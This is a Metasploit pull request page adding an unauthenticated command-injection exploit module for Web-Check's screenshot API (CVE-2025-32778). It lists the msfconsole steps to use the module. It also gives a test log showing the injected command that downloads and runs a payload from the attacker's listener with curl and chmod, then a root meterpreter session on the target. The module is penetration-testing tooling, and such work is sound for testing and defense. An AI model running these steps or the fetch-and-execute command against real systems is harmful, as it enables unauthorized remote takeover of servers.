
Add Web-Check screenshot API command injection RCE exploit (CVE-2025-32778)#20791

Merged
bwatters-r7 merged 4 commits into rapid7:master from Chocapikk:webcheck
Jan 12, 2026

Conversation

@Chocapikk Chocapikk (Contributor) commented Dec 18, 2025

Hello Metasploit Team,

This PR adds an exploit module for CVE-2025-32778, a command injection vulnerability in Web-Check's screenshot API endpoint. The vulnerability allows unauthenticated remote code execution by injecting shell commands via URL query parameters in the /api/screenshot endpoint.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/http/web_check_screenshot_rce
  • set RHOSTS <target_ip>
  • set RPORT 3000
  • set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
  • set LHOST <listener_ip>
  • run
  • Verify the module detects the vulnerability via timing-based check
  • Verify a meterpreter session is established
  • Verify commands can be executed in the session

…etected

Co-authored-by: bwatters-r7 <bwatters-r7@users.noreply.github.com>
@jheysel-r7 jheysel-r7 removed their assignment Jan 9, 2026
@bwatters-r7 bwatters-r7 self-assigned this Jan 12, 2026
@bwatters-r7 bwatters-r7 (Contributor) commented:

msf exploit(multi/http/web_check_screenshot_rce) > show options

Module options (exploit/multi/http/web_check_screenshot_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, s
                                         ocks5, socks5h, http, sapni
   RHOSTS     10.5.135.119     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Web-Check
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, GET, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Lin
                                              ux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      cEDJKJDbPtY      no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Unix/Linux Command



View the full module info with the info, or info -d command.

msf exploit(multi/http/web_check_screenshot_rce) > run
[*] Command to run on remote host: curl -so ./oOdSmVxo http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg;chmod +x ./oOdSmVxo;./oOdSmVxo&
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /RByzlSnTzclKDpvXskXIrg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Testing command injection (baseline: 0.48s)
[*] Sleep 2s: 2.45s (threshold: 1.52s)
[*] Sleep 3s: 3.46s (threshold: 2.52s)
[*] Sleep 4s: 4.45s (threshold: 3.52s)
[+] The target is vulnerable. Command injection vulnerability confirmed via sleep timing
[*] Sending payload via screenshot API
[*] Client 10.5.135.119 requested /RByzlSnTzclKDpvXskXIrg
[*] Sending payload to 10.5.135.119 (curl/7.74.0)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.135.119:38502) at 2026-01-12 17:09:12 -0600

meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Debian 11.9 (Linux 6.14.0-1014-azure)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

@github-project-automation github-project-automation Bot moved this from Todo to In Progress in Metasploit Kanban Jan 12, 2026
@bwatters-r7 bwatters-r7 merged commit 10d1257 into rapid7:master Jan 12, 2026
18 checks passed
@github-project-automation github-project-automation Bot moved this from In Progress to Done in Metasploit Kanban Jan 12, 2026
@bwatters-r7 bwatters-r7 (Contributor) commented:

Release Notes

Adds an exploit module for CVE-2025-32778, a command injection vulnerability in Web-Check's screenshot API endpoint which allows unauthenticated remote code execution by injecting shell commands via URL query parameters in the /api/screenshot endpoint.

@sjanusz-r7 sjanusz-r7 added module rn-modules release notes for new or majorly enhanced modules docs labels Jan 15, 2026